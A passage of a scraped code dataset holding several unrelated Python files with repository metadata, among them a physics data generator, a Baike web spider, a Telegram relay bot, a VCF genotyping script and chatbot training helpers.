x.keys()\n        for key in keys:\n            values = np.array(x[key][0])\n            images.append(values[0])\n            labels.append(x[key][1])\n    return np.array(images),np.array(labels)\n\ndef get_feature(labels,feature):\n    feature_values = []\n    for i in labels:\n        
feature_values.append(i[feature])\n feature_values = np.array(feature_values)\n return feature_values\n\ndef get_cuts(labels):\n feature_values = []\n for i in labels:\n try:\n feature_values.append(i[10])\n except:\n feature_values.append(0)\n feature_values=np.array(feature_values)\n return feature_values\n\ndef get_cos_values(zenith,azimuth,activation):\n cos1 = []\n cos2 = []\n cos3 = []\n for i,j in zip(zenith,azimuth):\n cos1.append(i/np.pi)\n if j < np.pi:\n cos2.append(j/np.pi)\n cos3.append(0)\n elif j >= np.pi:\n cos2.append((j-np.pi)/np.pi)\n cos3.append(1)\n \n return np.array(cos1),np.array(cos2),np.array(cos3)\n\n\nclass Data_generator(Sequence):\n\n def __init__(self,directory,batch_size,activation_function='sigmoid',percent=1.0,shuffle=False,first_iter=False,augmentations=None,up = 0):\n y = os.listdir(directory)\n self.files = []\n import random\n random.seed(10)\n\n for i in y:\n if random.uniform(0,1) < percent:\n self.files.append(directory+i)\n\n self.files = np.array(self.files)\n self.batch_size = batch_size\n self.files_split = np.array_split(self.files,np.ceil(len(self.files)/self.batch_size))\n self.shuffle = shuffle\n self.activation_function = activation_function\n self.on_epoch_end()\n self.first_iter = first_iter\n self.augment = augmentations\n self.up = up\n\n def __len__(self):\n #length = int(np.ceil(len(self.files)/float(self.batch_size)))\n length = len(self.files_split)\n return length\n\n def __getitem__(self,index):\n\n #indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]\n #list_IDs_temp = [self.files[k] for k in indexes]\n list_IDs_temp = self.files_split[index]\n\n X, Y = self.__data_generation(list_IDs_temp)\n \n return X, Y\n\n\n def on_epoch_end(self):\n self.indexes = np.arange(len(self.files_split))\n if self.shuffle == True:\n np.random.shuffle(self.indexes)\n\n def __data_generation(self,self_IDs_temp):\n images,labels = load_files(self_IDs_temp)\n pre_zenith_values = get_feature(labels,1)\n pre_azimuth_values = get_feature(labels,2)\n pre_line_fit_az = get_feature(labels,8)\n pre_line_fit_zen = get_feature(labels,9)\n line_fit_status = get_cuts(labels)\n energy = get_feature(labels,0)\n check_zip = list(zip(pre_zenith_values,pre_azimuth_values,pre_line_fit_az,pre_line_fit_zen,line_fit_status,energy))\n \n zenith_values = []\n azimuth_values = []\n line_fit_az = []\n line_fit_zen = []\n line_fit_stat = []\n energy_new = []\n \n for i in check_zip:\n zenith_values.append(i[0])\n azimuth_values.append(i[1])\n line_fit_az.append(i[2])\n line_fit_zen.append(i[3])\n line_fit_stat.append(i[4])\n energy_new.append(i[5])\n \n zenith_values = np.array(zenith_values)\n azimuth_values = np.array(azimuth_values)\n line_fit_az = np.array(line_fit_az)\n line_fit_zen = np.array(line_fit_zen)\n line_fit_stat = np.array(line_fit_stat)\n energy_new = np.array(energy_new)\n\n if self.up == 0:\n check = list(zip(zenith_values,azimuth_values,line_fit_az,line_fit_zen,images,line_fit_stat,energy_new))\n new_values = []\n for i in check:\n new_values.append(i)\n \n zenith_values = np.array(list(zip(*new_values))[0])\n azimuth_values = np.array(list(zip(*new_values))[1])\n images = np.array(list(zip(*new_values))[4],dtype=np.uint8)\n line_fit_az = np.array(list(zip(*new_values))[2])\n line_fit_zen = np.array(list(zip(*new_values))[3])\n\n\n elif self.up == 1:\n check = list(zip(zenith_values,azimuth_values,line_fit_az,line_fit_zen,images,line_fit_stat,energy_new))\n new_values = []\n for i in check:\n if np.log10(i[6]) < 5: \n 
new_values.append(i)\n \n zenith_values = np.array(list(zip(*new_values))[0])\n azimuth_values = np.array(list(zip(*new_values))[1])\n images = np.array(list(zip(*new_values))[4],dtype=np.uint8)\n line_fit_az = np.array(list(zip(*new_values))[2])\n line_fit_zen = np.array(list(zip(*new_values))[3])\n\n elif self.up == 2:\n check = list(zip(zenith_values,azimuth_values,line_fit_az,line_fit_zen,images,line_fit_stat,energy_new))\n new_values = []\n for i in check:\n if np.log10(i[6]) > 5:\n new_values.append(i)\n\n zenith_values = np.array(list(zip(*new_values))[0])\n azimuth_values = np.array(list(zip(*new_values))[1])\n images = np.array(list(zip(*new_values))[4],dtype=np.uint8)\n line_fit_az = np.array(list(zip(*new_values))[2])\n line_fit_zen = np.array(list(zip(*new_values))[3])\n\n cos1_line,cos2_line,cos3_line = get_cos_values(line_fit_zen,line_fit_az,self.activation_function)\n cos1,cos2,cos3 = get_cos_values(zenith_values,azimuth_values,self.activation_function)\n cos_values = np.array(list(zip(cos1,cos2,cos3)))\n cos_values_line = np.array(list(zip(cos1_line,cos2_line,cos3_line)))\n \n return [images],[cos1,cos2,cos3]\n \n \n \n\n\n \n\n","repo_name":"andyPhysics/DNN_Project","sub_path":"script/Network/Data_generator.py","file_name":"Data_generator.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"749854525","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom newSpider.items import NewspiderItem\nimport urllib\nimport re\nimport json\nsplit_sign = '##'\nclass HudongSpider(scrapy.Spider):\n name = 'hudong'\n allowed_domains = ['http://www.baike.com']\n # count = 0\n crops_file_object = open('crops.txt', 'r', encoding='utf-8').read()\n disease_file_object = open('disease.txt', 'r', encoding='utf-8').read()\n crops_wordList = crops_file_object.split() # 获取词表\n disease_wordList = disease_file_object.split()\n\n wordList = crops_wordList + disease_wordList\n start_urls = []\n # pp = 0\n for i in wordList: ##生成url列表\n cur = \"http://www.baike.com/wiki/\"\n cur = cur + str(i)\n start_urls.append(cur)\n # pp += 1\n # print(cur)\n # if pp > 100:\n # break\n def parse(self, response):\n #filename = \"encyclopedia.html\"\n #open(filename, 'wb').write(response.body)\n # div限定范围\n main_div = response.xpath('//div[@class=\"w-990\"]')\n# ——————————————————————————————————————————新————————————————————————————————————————————\n title = response.url.split('/')[-1] # ---------通过截取url获取title-------------\n # urllib.request 请求模块\n # urllib.error 异常处理模块\n # urllib.parse url解析模块\n # urllib.robotparser robots.txt解析模块\n title = urllib.parse.unquote(title)\n # find到了返回下标,没找到返回-1\n if title.find('isFrom=intoDoc') != -1:\n title = 'error'\n\n url = response.url # ---------------------url直接得到-------------------\n url = urllib.parse.unquote(url)\n\n # nodename\t选取此节点的所有子节点。\n # /\t从根节点选取。\n # //\t从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置。\n # .\t选取当前节点。\n # ..\t选取当前节点的父节点。\n # @\t选取属性。\n img = \"\" # -----------------------爬取图片url-----------------------------\n for p in main_div.xpath('.//div[@class=\"r w-300\"]/div[@class=\"doc-img\"]/a/img/@src'):\n img = p.extract().strip()\n\n openTypeList = \"\" # -----------------爬取开放域标签-------------------\n flag = 0 # flag用于分隔符处理(第一个词前面不插入分隔符)\n for p in main_div.xpath('.//div[@class=\"l w-640\"]/div[@class=\"place\"]/p[@id=\"openCatp\"]/a/@title'):\n if flag == 1:\n openTypeList += split_sign\n openTypeList += \" \"\n openTypeList += p.extract().strip()\n flag = 1\n\n detail = 
\"\" # ---------详细信息---------------\n detail_xpath = main_div.xpath('.//div[@class=\"l w-640\"]/div[@class=\"information\"]/div[@class=\"summary\"]/p')\n if len(detail_xpath) > 0:\n detailb = detail_xpath.xpath('string(.)').extract()[0].strip()\n detailc = re.sub(\"\\t|\\n|\\r\", \"\", detailb)\n detail += detailc.replace('\"', '')\n if detail == \"\": # 可能没有\n detail_xpath = main_div.xpath('.//div[@class=\"l w-640\"]/div[@id=\"content\"]')\n if len(detail_xpath) > 0:\n detaila = detail_xpath.xpath('string(.)').extract()[0].strip()\n detaild = re.sub(\"\\t|\\n|\\r\", \"\", detaila)\n detail += detaild.replace('\"', '')\n\n flag = 0\n baseInfoKeyList = \"\" # 基本信息的key值\n for p in main_div.xpath(\n './/div[@class=\"l w-640\"]/div[@name=\"datamodule\"]/div[@class=\"module zoom\"]/table//strong/text()'):\n if flag == 1:\n baseInfoKeyList += split_sign\n baseInfoKeyList += \" \"\n baseInfoKeyList += p.extract().strip()\n flag = 1\n\n ## 继续调xpath!!!!!!!!!!!!!\n flag = 0\n baseInfoValueList = \"\" # 基本信息的value值\n base_xpath = main_div.xpath('.//div[@class=\"l w-640\"]/div[@name=\"datamodule\"]/div[@class=\"module zoom\"]/table')\n for p in base_xpath.xpath('.//span'):\n if flag == 1:\n baseInfoValueList += split_sign\n baseInfoValueList += \" \"\n all_text = p.xpath('string(.)').extract()[0].strip()\n baseInfoValueList += all_text\n flag = 1\n# ————————————————————————————————————++————结束————————————————————————————————————————\n# ---------通过截取url获取name-------------\n# name = response.url.split('/')[-1]\n# # urllib.request 请求模块\n# # urllib.error 异常处理模块\n# # urllib.parse url解析模块\n# # urllib.robotparser robots.txt解析模块\n# name = urllib.parse.unquote(name)\n# if name.find('isFrom=intoDoc') != -1:\n# name = 'error'\n# -----------获取补全信息键---------------\n count = 0\n InfoKeyList = \"\"\n for p in main_div.xpath('.//div[@class=\"l w-640\"]/fieldset[@id=\"catalog\"]/div[@id=\"full-all\"]/ul/li/a/@title'):\n if count >= 0:\n InfoKeyList += split_sign\n InfoKeyList += p.extract().strip()\n count += 1\n# -----------获取补全信息值---------------\n counta = 0\n InfoValueList = \"\"\n info_xpath = main_div.xpath('.//div[@id=\"content\"]')\n for p in info_xpath.xpath('.//p'):\n if counta >= 0:\n InfoValueList += split_sign\n InfoValueList += \" \"\n if (re.sub('\\t|\\n|\\r',\"\",p.xpath('string(.)').extract()[0].strip())) != \"\":\n infoa = p.xpath('string(.)').extract()[0].strip()\n infob = re.sub('\\t|\\n|\\r',\"\",infoa)\n InfoValueList += infob.replace('\"','')\n counta += 1\n if counta == len(info_xpath.xpath('.//p')) and counta < count:\n for i in range(count-len(info_xpath.xpath('.//p'))):\n InfoValueList += \"##\"\n InfoValueList += \" \"\n if count == counta:\n break\n\n item = NewspiderItem()\n item['title'] = title.replace(u'\\xa0', u' ')\n item['url'] = url.replace(u'\\xa0', u' ')\n item['image'] = img.replace(u'\\xa0', u' ')\n item['openTypeList'] = openTypeList.replace(u'\\xa0', u' ')\n item['detail'] = detail.replace(u'\\xa0', u' ')\n item['baseInfoKeyList'] = baseInfoKeyList.replace(u'\\xa0', u' ')\n item['baseInfoValueList'] = baseInfoValueList.replace(u'\\xa0', u' ')\n item['baseInfoKeyList'] = baseInfoKeyList.replace(u'\\xa0', u' ')\n item['baseInfoValueList'] = baseInfoValueList.replace(u'\\xa0', u' ')\n item['InfoKeyList'] = InfoKeyList.replace(u'\\xa0', u' ')\n item['InfoValueList'] = InfoValueList.replace(u'\\xa0', u' ')\n\n # file = open('newSpider/data/hudong_pedia.json', 'wb')\n # line = \"\"\n # line += json.dumps(dict(item), ensure_ascii=False) + '\\n'\n # file.write(line)\n yield 
item","repo_name":"XuanMi/KnowledgeMap","sub_path":"new_spider/newSpider/newSpider/spiders/hudong.py","file_name":"hudong.py","file_ext":"py","file_size_in_byte":7355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25172614698","text":"from google.cloud import texttospeech\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nimport io\n\n\nclass TextToSpeech:\n    def __init__(self):\n        self.client = texttospeech.TextToSpeechClient()\n        self.voice = texttospeech.VoiceSelectionParams(\n            language_code='en-US',\n            name=\"en-US-Wavenet-J\"\n        )\n        self.audio_config = texttospeech.AudioConfig(\n            audio_encoding=texttospeech.AudioEncoding.MP3\n        )\n\n    def generate_mp3(self, text: str) -> bytes:\n        \"\"\"\n        Converts text to speech and returns the mp3 data\n        \"\"\"\n        synthesis_input = texttospeech.SynthesisInput(text=text)\n        response = self.client.synthesize_speech(\n            input=synthesis_input, voice=self.voice, audio_config=self.audio_config\n        )\n        return response.audio_content\n\n    def say(self, text: str) -> None:\n        \"\"\"\n        Converts text to speech and plays it using pydub\n        \"\"\"\n        mp3_data = self.generate_mp3(text)\n        play(AudioSegment.from_file(io.BytesIO(mp3_data), format=\"mp3\"))\n","repo_name":"AlecHaring/openai-conversation","sub_path":"src/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11279380706","text":"import Telibrary\n### to make a bot\nimport botlib\n### to make it a messenger bot\n\n### initializing the bot:\nbot = Telibrary.Bot(\n    '', ### token\n    '', ### owner's numerical ID\n    {\n        'https': 'socks5h://127.0.0.1:9050' ### proxy\n    }\n)\n\nMessanger = botlib.MessengerBot(bot)\n\n### I needed a tmp file to save the update id.\n### give it the full path (pwd/tmp.txt)\nupdater = open('tmp.txt', 'r')\nupdateid = updater.readline()\nupdater.close()\n\ndef main(updateid):\n    while True:\n        res = bot.update(updateid)\n        if res.json()['result'] != 0:\n            for i in res.json()['result']:\n                if i['message']['from']['id'] != int(bot.ADMINID):\n                    Messanger.get_it(i)\n                    updateid = i['update_id'] + 1\n                else:\n                    try:\n                        if i['message']['text'] == '/For':\n                            Messanger.tell_admin('your next message will be forwarded to this user; /C to cancel!',\n                                                i['message']['reply_to_message']['message_id'])\n                            updateid = i['update_id'] + 1\n                            is_done = False\n                            while not is_done:\n                                tmp_res = bot.update(updateid)\n                                if tmp_res.json()['result'] != 0:\n                                    for j in tmp_res.json()['result']:\n                                        if str(j['message']['from']['id']) != bot.ADMINID:\n                                            Messanger.get_it(j)\n                                            updateid = j['update_id'] + 1\n                                        else:\n                                            if j['message']['text'] == '/C':\n                                                Messanger.tell_admin('cancelled!', j['message']['message_id'])\n                                                updateid = j['update_id'] + 1\n                                                is_done = True\n                                            else:\n                                                bot.forward(i['message']['reply_to_message']['forward_from']['id'], \n                                                    bot.ADMINID, \n                                                    j['message']['message_id'])\n                                                updateid = j['update_id'] + 1\n                                                Messanger.tell_admin('done',\n                                                    j['message']['message_id'])\n                                                updateid = j['update_id'] + 1\n                        elif i['message']['text'] == '/Help':\n                            Messanger.tell_admin('reply to reply and /For to forward!')\n                            updateid = i['update_id'] + 1\n                        else:\n                            Messanger.send_it(i)\n                            updateid = i['update_id'] + 1\n                    except:\n                        pass\n### give it the full path (pwd/tmp.txt)\n        updater = open('tmp.txt', 'w')\n        updater.writelines(str(updateid))\n        updater.close()\n\nif __name__ == '__main__':\n    
main(updateid)\n","repo_name":"Eminor021/Telenger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26544915505","text":"#!/usr/bin/python3\nfrom argparse import ArgumentParser\nimport sys\nfrom os import path\nfrom collections import defaultdict, namedtuple\nimport logging\n\nlogging.basicConfig(filename='genotyping_warnings.log', filemode='w', format='%(message)s')\n\nparser = ArgumentParser()\nparser.add_argument(\"inputfile\", help = \"Input file in vcf format. Only works for pseudoSample vcf.\")\nparser.add_argument(\"contig_alignment_file\", help = \"Alignments per chromosome. File usually generated by CRAM2VCF.pl with suffix _alignmentsPerRefID\")\nparser.add_argument(\"qid_prefix\", help = \"Path and prefix to *.queryIDs files\")\nparser.add_argument(\"samples\", help = \"File listing SampleIDs and ChromosomeIDs. E.g. 'human01 human01.h0 human01.h1' . These IDs will be related to the IDs specified with split_identify_fasta.py\")\nparser.add_argument(\"--mode\", help = \"[overlapping|pseudosamples*] , *:default\", default = \"pseudosamples\")\nparser.add_argument(\"outputfile\", help=\"Output file in vcf format\")\nargs = parser.parse_args()\n\n\"\"\"\n\nPseudosamples format\n#CHROM POS ID REF ALT QUAL FILTER INFO\nchr1 10815 . T TC . PASS . GT:CONTIG 0/1/0/0/0/0:0,1,2,3,4,5\n\nOverlapping format\n#CHROM POS ID REF ALT QUAL FILTER INFO\nchr1 10815 . T TC . PASS CONTIG=0/2/3/4/5,1\n\n\"\"\"\n \nclass Genotypes():\n def __init__(self,sids,samplefile):\n self.sampleIds = sids\n self.samplePos = {} # positions of haplotypes\n with open(samplefile) as f:\n for line in f:\n sid, sid1, sid2 = line.rstrip().split()\n if sid not in self.sampleIds:\n print(sid + \" in sampleID file not in specified ids.\")\n self = None\n pos = self.sampleIds.index(sid)*2 # diploid\n self.samplePos[sid1] = pos\n self.samplePos[sid2] = pos + 1\n\n def get_header(self):\n return \"\\t\".join(self.sampleIds)\n\n def get_fullgenotypestring(self, gtstring):\n \"\"\" Transforms '0100' to '0|1 0|0'\"\"\"\n final = \"\"\n for i in range(0, len(gtstring), 2):\n gt = \".\" if gtstring[i] == \"-\" else gtstring[i]\n final += gt\n final += \"|\"\n gt = \".\" if gtstring[i+1] == \"-\" else gtstring[i+1]\n final += gt\n final += \"\\t\"\n return final.rstrip()\n\n \n def get_genotypes_from_pseudosamples(self, chrom, position, info, table):\n \"\"\" Returns genotypes as a string for a specific variant at chrom:position \"\"\"\n gtstring = [\"-\"] * len(self.sampleIds) * 2 # diploid\n gtst, idst = info.split(\":\")\n gts = gtst.split(\"/\")\n ids = idst.split(\",\")\n if len(gts) != len(ids):\n logging.warning(str(gts) + \" and \" + str(ids) + \" are not the same length at \" + str(chrom) + \": \" + str(position))\n return self.get_fullgenotypestring(gtstring)\n for gt, idx in zip(gts,ids):\n s = table[chrom][idx].sampleid\n curra = gtstring[self.samplePos[s]] \n if curra == \"-\":\n gtstring[self.samplePos[s]] = gt\n elif curra == gt:\n logging.warning(str(s) + \" is found multiple times at \" + str(chrom) + \": \" + str(position))\n elif curra == \".\":\n logging.warning(str(s) + \" is already ambigious and there is more data \" + str(gt) + \" at \" + str(chrom) + \": \" + str(position))\n elif curra != str(gt):\n logging.error(str(s) + \" is both \" + curra + \" and \" + str(gt) + \" at \" + str(chrom) + \": \" + str(position))\n gtstring[self.samplePos[s]] = \".\" \n return 
self.get_fullgenotypestring(gtstring)\n \n \n def get_genotypes_from_overlapping(self, chrom, position, info, table):\n \"\"\" Returns genotypes as a string for a specific variant at chrom:position \"\"\"\n gtstring = [\"-\"] * len(self.sampleIds) * 2 # diploid \n idfields = info.lstrip(\"CONTIG=\").split(\",\") \n for allelenr, ids in enumerate(idfields): \n #print(\"ids: \" + ids) \n if ids == \"-1\": \n continue \n for idx in ids.split(\"/\"): \n s = table[chrom][idx].sampleid \n curra = gtstring[self.samplePos[s]] \n if curra == \"-\": \n gtstring[self.samplePos[s]] = str(allelenr) \n elif curra == str(allelenr): \n logging.warning(str(s) + \" is found multiple times at \" + str(chrom) + \": \" + str(position)) \n elif curra == \".\": \n logging.warning(str(s) + \" is already ambigious and there is more data \" + str(allelenr) + \" at \" + str(chrom) + \": \" + str(position)) \n elif curra != str(allelenr): \n logging.error(str(s) + \" is both \" + curra + \" and \" + str(allelenr) + \" at \" + str(chrom) + \": \" + str(position)) \n gtstring[self.samplePos[s]] = \".\" \n return self.get_fullgenotypestring(gtstring)\n\n\n \n\n# Get utilized referenceIDs and save path to corresponding queryIDs files\nidfiles = {}\nwith open(args.contig_alignment_file) as f:\n for line in f:\n if line.startswith(\"referenceID\"):\n continue\n chrom = line.split()[0]\n ipath = args.qid_prefix + chrom + \".queryIDs\"\n idfiles[ipath] = chrom\n\nidPair = namedtuple('idPair', ['fullid', 'sampleid']) # used to save both the full id and the sampleID\n\n# Get sampleIds\nwith open(args.samples) as f:\n sampleIds = []\n for line in f:\n sampleId = line.rstrip().split()[0]\n sampleIds.append(sampleId)\n\n\n\n# Relate vcf IDs with sample IDs\nids_per_chrom = defaultdict(dict)\nfor idf, chrom in idfiles.items():\n if not path.exists(idf):\n print(\"Could not find \" + str(idf))\n continue\n else:\n with open(idf) as f:\n for line in f:\n fid, vid = line.rstrip().split()\n ids_per_chrom[chrom][vid] = idPair(fid, fid.split(\"_\")[0])\n\ngto = Genotypes(sampleIds, args.samples)\n\n# Add the haplotype information to each variant\nheader = \"\"\nwith open(args.outputfile, 'w+') as outf:\n with open(args.inputfile) as f:\n # First get the header and add sample names\n for line in f:\n if line.startswith('#'):\n header += line\n else:\n sheader = header.split(\"\\n\")\n newinfo = sheader[-2] + \"\\tFORMAT\\t\"+ gto.get_header()\n header = \"\\n\".join(sheader[:-2] + [\"##FORMAT=\", newinfo])\n outf.write(header + \"\\n\")\n #print(line.rstrip())\n break\n # Now add genotype information for each sample and variant\n f.seek(0)\n counter = 0\n for line in f:\n if line.startswith('#'):\n continue\n else:\n counter += 1\n if counter % 10000 == 0:\n print(str(counter) + \" variants changed\", end=\"\\r\")\n sline = line.rstrip().split()\n if sline[6] == \"tainted\":\n logging.warning(\"This variant is tainted: \" + line.rstrip())\n continue\n if args.mode == \"pseudosamples\":\n genotypes = gto.get_genotypes_from_pseudosamples(sline[0],sline[1], sline[9], ids_per_chrom)\n outf.write(\"\\t\".join(line.rstrip().split()[:-2]) + \"\\tGT\\t\" + genotypes + \"\\n\")\n elif args.mode == \"overlapping\":\n genotypes = gto.get_genotypes_from_overlapping(sline[0],sline[1], sline[9], ids_per_chrom)\n outf.write(line.rstrip() + \"\\tGT\\t\" + genotypes + \"\\n\")\n 
\n","repo_name":"NCBI-Hackathons/NovoGraph","sub_path":"scripts/genotype_vcf.py","file_name":"genotype_vcf.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"18393890105","text":"# coding: utf-8\n\"\"\"Release data for the abiflows project.\"\"\"\nfrom collections import OrderedDict\n\n# Name of the package for release purposes. This is the name which labels\n# the tarballs and RPMs made by distutils, so it's best to lowercase it.\nname = 'abiflows'\n\n# version information. An empty _version_extra corresponds to a full\n# release. 'dev' as a _version_extra string means this is a development version\n_version_major = 0\n_version_minor = 6\n_version_micro = '' # use '' for first of series, number for 1 and above\n#_version_extra = 'dev'\n_version_extra = '' # Uncomment this for full releases\n\n# Construct full version string from these.\n_ver = [_version_major, _version_minor]\nif _version_micro: _ver.append(_version_micro)\nif _version_extra: _ver.append(_version_extra)\n\n__version__ = '.'.join(map(str, _ver))\n\nversion = __version__ # backwards compatibility name\n\n# The minimum Abinit version compatible with AbiFlows\n#min_abinit_version = \"8.0.8\"\n\ndescription = \"Framework for high-throughput calculations with ABINIT\"\n\nlong_description = \\\n \"\"\"\n The latest development version is always available from site \n \"\"\"\n\nlicense = 'GPL'\n\nauthor = 'The Abinit group'\nauthor_email = 'matteo.giantomassi@uclouvain.be'\nmaintainer = \"Matteo Giantomassi\"\nmaintainer_email = author_email\nauthors = OrderedDict([\n ('Guido', ('G. Petretto', 'nobody@nowhere')),\n ('David', ('D. Waroquiers', 'nobody@nowhere')),\n ('Matteo', ('M. Giantomassi', 'nobody@nowhere')),\n ('Michiel', ('M. J. 
van Setten', 'nobody@nowhere')),\n])\n\nurl = \"https://github.com/abinit/abiflows\"\ndownload_url = \"https://github.com/abinit/abiflows\"\nplatforms = ['Linux', 'darwin']\nkeywords = [\"ABINIT\", \"ab-initio\", \"density-function-theory\", \"first-principles\", \"electronic-structure\", \"pymatgen\"]\n\nclassifiers = [\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: GNU General Public License v2 (GPLv2)\",\n \"Operating System :: OS Independent\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Scientific/Engineering :: Physics\",\n \"Topic :: Scientific/Engineering :: Chemistry\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n]\n","repo_name":"abinit/abiflows","sub_path":"abiflows/core/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"10583133381","text":"import glob\r\nimport logging\r\nimport os\r\nimport pickle\r\nimport random\r\nimport re\r\nimport shutil\r\nfrom typing import Dict, List, Tuple\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom torch.nn.utils.rnn import pad_sequence\r\nfrom torch.utils.data import DataLoader, Dataset, RandomSampler, SequentialSampler\r\nfrom torch.utils.data.distributed import DistributedSampler\r\nfrom tqdm.notebook import tqdm, trange\r\n\r\nfrom pathlib import Path\r\n\r\nfrom transformers import (\r\n MODEL_WITH_LM_HEAD_MAPPING,\r\n WEIGHTS_NAME,\r\n AdamW,\r\n AutoConfig,\r\n PreTrainedModel,\r\n PreTrainedTokenizer,\r\n get_linear_schedule_with_warmup,\r\n)\r\n\r\ntry:\r\n from torch.utils.tensorboard import SummaryWriter\r\nexcept ImportError:\r\n from tensorboardX import SummaryWriter\r\n\r\ndef readInData():\r\n data = pd.read_csv('theOfficeTranscript.csv', sep=',')\r\n data.sample(6)\r\n CHARACTER_NAME = 'Dwight'\r\n\r\n contexted = []\r\n # context window of size 7\r\n n = 7\r\n\r\n for i in data[data.name == CHARACTER_NAME].index:\r\n if i < n:\r\n continue\r\n row = []\r\n prev = i - 1 - n # we additionally substract 1, so row will contain current responce and 7 previous responces\r\n\r\n for j in range(i, prev, -1):\r\n row.append(data.line[j])\r\n contexted.append(row)\r\n\r\n columns = ['response', 'context']\r\n columns = columns + ['context/' + str(i) for i in range(n - 1)]\r\n\r\n df = pd.DataFrame.from_records(contexted, columns=columns)\r\n\r\n df.sample(6)\r\n\r\n trn_df, val_df = train_test_split(df, test_size=0.1)\r\n trn_df.head()\r\n\r\n # create dataset suitable for our model\r\ndef construct_conv(row, tokenizer, eos = True):\r\n flatten = lambda l: [item for sublist in l for item in sublist]\r\n conv = list(reversed([tokenizer.encode(x) + [tokenizer.eos_token_id] for x in row]))\r\n conv = flatten(conv)\r\n return conv\r\n\r\nclass ConversationDataset(Dataset):\r\n def __init__(self, tokenizer: PreTrainedTokenizer, args, df, block_size=512):\r\n\r\n block_size = block_size - (tokenizer.model_max_length - tokenizer.max_len_single_sentence)\r\n\r\n directory = args.cache_dir\r\n cached_features_file = os.path.join(\r\n directory, args.model_type + \"_cached_lm_\" + str(block_size)\r\n )\r\n\r\n if os.path.exists(cached_features_file) and not args.overwrite_cache:\r\n 
logger.info(\"Loading features from cached file %s\", cached_features_file)\r\n            with open(cached_features_file, \"rb\") as handle:\r\n                self.examples = pickle.load(handle)\r\n        else:\r\n            logger.info(\"Creating features from dataset file at %s\", directory)\r\n\r\n            self.examples = []\r\n            for _, row in df.iterrows():\r\n                conv = construct_conv(row, tokenizer)\r\n                self.examples.append(conv)\r\n\r\n            logger.info(\"Saving features into cached file %s\", cached_features_file)\r\n            with open(cached_features_file, \"wb\") as handle:\r\n                pickle.dump(self.examples, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n    def __len__(self):\r\n        return len(self.examples)\r\n\r\n    def __getitem__(self, item):\r\n        return torch.tensor(self.examples[item], dtype=torch.long)\r\n\r\n# Caching and storing of data/checkpoints\r\n\r\ndef load_and_cache_examples(args, tokenizer, df_trn, df_val, evaluate=False):\r\n    return ConversationDataset(tokenizer, args, df_val if evaluate else df_trn)\r\n\r\n\r\ndef set_seed(args):\r\n    random.seed(args.seed)\r\n    np.random.seed(args.seed)\r\n    torch.manual_seed(args.seed)\r\n    if args.n_gpu > 0:\r\n        torch.cuda.manual_seed_all(args.seed)\r\n\r\n\r\ndef _sorted_checkpoints(args, checkpoint_prefix=\"checkpoint\", use_mtime=False) -> List[str]:\r\n    ordering_and_checkpoint_path = []\r\n\r\n    glob_checkpoints = glob.glob(os.path.join(args.output_dir, \"{}-*\".format(checkpoint_prefix)))\r\n\r\n    for path in glob_checkpoints:\r\n        if use_mtime:\r\n            ordering_and_checkpoint_path.append((os.path.getmtime(path), path))\r\n        else:\r\n            regex_match = re.match(\".*{}-([0-9]+)\".format(checkpoint_prefix), path)\r\n            if regex_match and regex_match.groups():\r\n                ordering_and_checkpoint_path.append((int(regex_match.groups()[0]), path))\r\n\r\n    checkpoints_sorted = sorted(ordering_and_checkpoint_path)\r\n    checkpoints_sorted = [checkpoint[1] for checkpoint in checkpoints_sorted]\r\n    return checkpoints_sorted\r\n
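# e.g. glob order ['out/checkpoint-1000', 'out/checkpoint-500'] comes back as\r\n# ['out/checkpoint-500', 'out/checkpoint-1000']: the integer suffix, not the\r\n# lexicographic path, drives the sort ('out' is an illustrative output_dir)\r\n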
\r\n\r\ndef _rotate_checkpoints(args, checkpoint_prefix=\"checkpoint\", use_mtime=False) -> None:\r\n    if not args.save_total_limit:\r\n        return\r\n    if args.save_total_limit <= 0:\r\n        return\r\n\r\n    # Check if we should delete older checkpoint(s)\r\n    checkpoints_sorted = _sorted_checkpoints(args, checkpoint_prefix, use_mtime)\r\n    if len(checkpoints_sorted) <= args.save_total_limit:\r\n        return\r\n\r\n    number_of_checkpoints_to_delete = max(0, len(checkpoints_sorted) - args.save_total_limit)\r\n    checkpoints_to_be_deleted = checkpoints_sorted[:number_of_checkpoints_to_delete]\r\n    for checkpoint in checkpoints_to_be_deleted:\r\n        logger.info(\"Deleting older checkpoint [{}] due to args.save_total_limit\".format(checkpoint))\r\n        shutil.rmtree(checkpoint)\r\n","repo_name":"reederward1285/theOfficeAI","sub_path":"ai-chatbot.py","file_name":"ai-chatbot.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70485058668","text":"'''\n5.\tRead two matrices A and B, each with a single dimension of 12 elements. \nBuild a two-dimensional matrix C, where the first column of matrix \nC must be formed by the elements of matrix A multiplied by 2, and the \nsecond column must be formed by the elements of matrix B minus 5.\n'''\n\nLINHAS = 12\n\na = []\nb = []\nc = []\n\n# matrix 